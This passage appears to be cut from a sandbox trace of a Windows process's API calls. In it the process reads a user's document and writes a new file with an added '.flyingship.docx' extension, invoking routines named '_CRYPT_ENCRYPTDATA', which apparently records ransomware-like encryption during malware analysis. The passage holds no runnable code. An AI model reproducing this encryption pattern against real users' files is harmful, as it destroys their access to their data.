hHeap=0x8a0000) returned 1 [0170.901] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db138 | out: hHeap=0x8a0000) returned 1 [0170.901] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0170.901] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x923ad0 | out: hHeap=0x8a0000) returned 1 [0170.901] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0170.901] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3f0 | out: hHeap=0x8a0000) returned 1 [0170.901] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0170.902] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2788 [0170.902] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x60) returned 0x9a5d10 [0170.902] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents")) returned 0x11 [0170.902] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9a5d10 | out: hHeap=0x8a0000) returned 1 [0170.902] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0170.902] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x923b28 | out: hHeap=0x8a0000) returned 1 [0170.902] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0170.902] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba168 | out: hHeap=0x8a0000) returned 1 [0170.902] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0170.902] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90af58 [0170.902] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10000) returned 0x9d5188 [0170.902] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba168 [0170.902] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26a8 [0170.902] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\j0tJZ4pqz2gw.flyingship.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\j0tjz4pqz2gw.flyingship.docx"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0170.904] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dece0 [0170.904] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3f0 [0170.904] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27c8 [0170.904] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4f8 | out: hHeap=0x8a0000) returned 1 [0170.904] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba408 | out: hHeap=0x8a0000) returned 1 [0170.904] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9a8 | out: hHeap=0x8a0000) returned 1 [0170.904] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded80 | out: hHeap=0x8a0000) returned 1 [0170.904] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0170.904] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0170.904] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26d8 [0170.904] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e83b8 [0170.904] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2788 [0170.904] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e83b8 | out: hHeap=0x8a0000) returned 1 [0170.904] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0170.904] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0170.904] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90aed8 [0170.904] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0170.904] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90aed8 | out: hHeap=0x8a0000) returned 1 [0170.904] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0170.904] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90aed8 [0170.904] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0170.904] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26d8 [0170.904] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded80 [0170.905] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9a8 [0170.905] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0170.905] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0170.905] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba408 [0170.905] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0170.905] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0170.905] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0170.905] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d480 | out: hHeap=0x8a0000) returned 1 [0170.905] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0170.905] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0170.905] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4f8 [0170.905] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b50 [0170.905] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2788 [0170.905] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x100000) returned 0x2420020 [0170.906] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87ef90 | out: lpNewFilePointer=0x0) returned 1 [0170.906] ReadFile (in: hFile=0x138, lpBuffer=0x9c5180, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87efb8, lpOverlapped=0x0 | out: lpBuffer=0x9c5180*, lpNumberOfBytesRead=0x87efb8*=0x10000, lpOverlapped=0x0) returned 1 [0170.910] ReadFile (in: hFile=0x138, lpBuffer=0x9c5180, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87efb8, lpOverlapped=0x0 | out: lpBuffer=0x9c5180*, lpNumberOfBytesRead=0x87efb8*=0x880e, lpOverlapped=0x0) returned 1 [0170.911] ReadFile (in: hFile=0x138, lpBuffer=0x9c5180, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87efb8, lpOverlapped=0x0 | out: lpBuffer=0x9c5180*, lpNumberOfBytesRead=0x87efb8*=0x0, lpOverlapped=0x0) returned 1 [0170.911] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b50 | out: hHeap=0x8a0000) returned 1 [0170.911] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0170.911] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4f8 | out: hHeap=0x8a0000) returned 1 [0170.912] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0170.912] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1880e) returned 0xa6b008 [0170.914] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x2420020 | out: hHeap=0x8a0000) returned 1 [0170.915] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9a8 | out: hHeap=0x8a0000) returned 1 [0170.915] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba408 | out: hHeap=0x8a0000) returned 1 [0170.915] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded80 | out: hHeap=0x8a0000) returned 1 [0170.915] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0170.915] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26d8 [0170.915] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1880e) returned 0xa83820 [0170.917] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xa6b008 | out: hHeap=0x8a0000) returned 1 [0170.917] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0170.917] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0170.917] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0170.917] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded80 [0170.917] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba408 [0170.917] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0170.917] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0170.917] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1880e) returned 0xa6b008 [0170.917] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0170.917] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xa6b008 | out: hHeap=0x8a0000) returned 1 [0170.917] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0170.917] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba408 | out: hHeap=0x8a0000) returned 1 [0170.917] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded80 | out: hHeap=0x8a0000) returned 1 [0170.917] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0170.917] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0170.917] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0170.917] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0170.918] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0170.918] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d480 | out: hHeap=0x8a0000) returned 1 [0170.918] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0170.918] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0170.918] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90afd8 [0170.918] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0170.918] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0170.918] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2668 [0170.918] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0170.918] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0170.919] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0170.919] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0170.919] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded80 [0170.919] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c2668 [0170.919] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8debc8 [0170.919] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba408 [0170.919] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0170.919] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2808 [0170.919] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1880e) returned 0xa6b008 [0170.919] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0170.919] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c2708 [0170.919] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9a8 [0170.919] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2628 [0170.919] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0170.919] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c2628 [0170.919] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4f8 [0170.919] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2688 [0170.919] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0170.919] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c2688 [0170.919] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b50 [0170.919] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27b8 [0170.919] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27b8 | out: hHeap=0x8a0000) returned 1 [0170.919] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd8e8 [0170.920] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8defb0 [0170.920] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd870 [0170.920] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27b8 [0170.920] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd438 [0170.920] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28d8 [0170.920] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1880e) returned 0x9e5190 [0170.922] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dedf8 [0170.923] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5d0 [0170.923] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2698 [0170.923] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5d0 | out: hHeap=0x8a0000) returned 1 [0170.923] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df190 [0170.923] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5d0 [0170.923] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec40 [0170.923] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3d8 [0170.923] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28a8 [0170.923] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd978 [0170.924] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec90 [0170.924] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd828 [0170.924] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2838 [0170.924] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdac8 [0170.924] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db138 [0170.924] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0170.924] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2828 [0170.924] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0170.924] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2828 [0170.924] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0170.924] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90b018 [0170.924] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0170.924] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0a0 [0170.924] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3f0 [0170.924] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2828 [0170.924] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3f0 | out: hHeap=0x8a0000) returned 1 [0170.924] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded58 [0170.924] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3f0 [0170.924] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7b0 [0170.924] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2638 [0170.924] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7b0 | out: hHeap=0x8a0000) returned 1 [0170.924] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2798 [0170.925] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db180 [0170.925] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0170.925] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db180 | out: hHeap=0x8a0000) returned 1 [0170.925] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0170.925] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df000 [0170.925] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c2798 [0170.925] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df168 [0170.925] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7b0 [0170.925] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2858 [0170.925] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0170.925] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd9c0 [0170.925] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8defd8 [0170.925] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd6f0 [0170.925] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2858 [0170.925] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd6f0 | out: hHeap=0x8a0000) returned 1 [0170.925] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee70 [0170.925] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd6f0 [0170.925] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db180 [0170.925] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0170.925] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df208 [0170.925] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda50 [0170.925] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26b8 [0170.925] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda68 [0170.926] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8b8 [0170.926] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0170.926] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8b8 | out: hHeap=0x8a0000) returned 1 [0170.926] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df078 [0170.926] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8b8 [0170.926] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27d8 [0170.926] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd798 [0170.926] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27d8 | out: hHeap=0x8a0000) returned 1 [0170.926] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d480 [0170.926] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27d8 [0170.926] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df118 [0170.926] CharLowerBuffW (in: lpsz="uint;dword", cchLength=0xa | out: lpsz="uint;dword") returned 0xa [0170.926] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4f8 [0170.926] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd960 [0170.926] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26f8 [0170.926] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9c70 [0170.926] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2658 [0170.926] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdab0 [0170.926] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26c8 [0170.926] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5b8 [0170.926] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2718 [0170.926] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0170.927] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26e8 [0170.927] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0170.927] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26e8 | out: hHeap=0x8a0000) returned 1 [0170.927] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5b8 | out: hHeap=0x8a0000) returned 1 [0170.927] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2718 | out: hHeap=0x8a0000) returned 1 [0170.927] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdab0 | out: hHeap=0x8a0000) returned 1 [0170.927] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0170.927] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26c8 [0170.927] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2718 [0170.927] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df118 | out: hHeap=0x8a0000) returned 1 [0170.927] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27d8 | out: hHeap=0x8a0000) returned 1 [0170.927] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd798 | out: hHeap=0x8a0000) returned 1 [0170.927] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8b8 | out: hHeap=0x8a0000) returned 1 [0170.927] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df078 | out: hHeap=0x8a0000) returned 1 [0170.927] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0170.927] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0170.927] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df078 [0170.927] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8b8 [0170.927] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0170.927] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d440 [0170.927] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4a8 [0170.927] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd798 [0170.927] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27d8 [0170.928] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdab0 [0170.928] 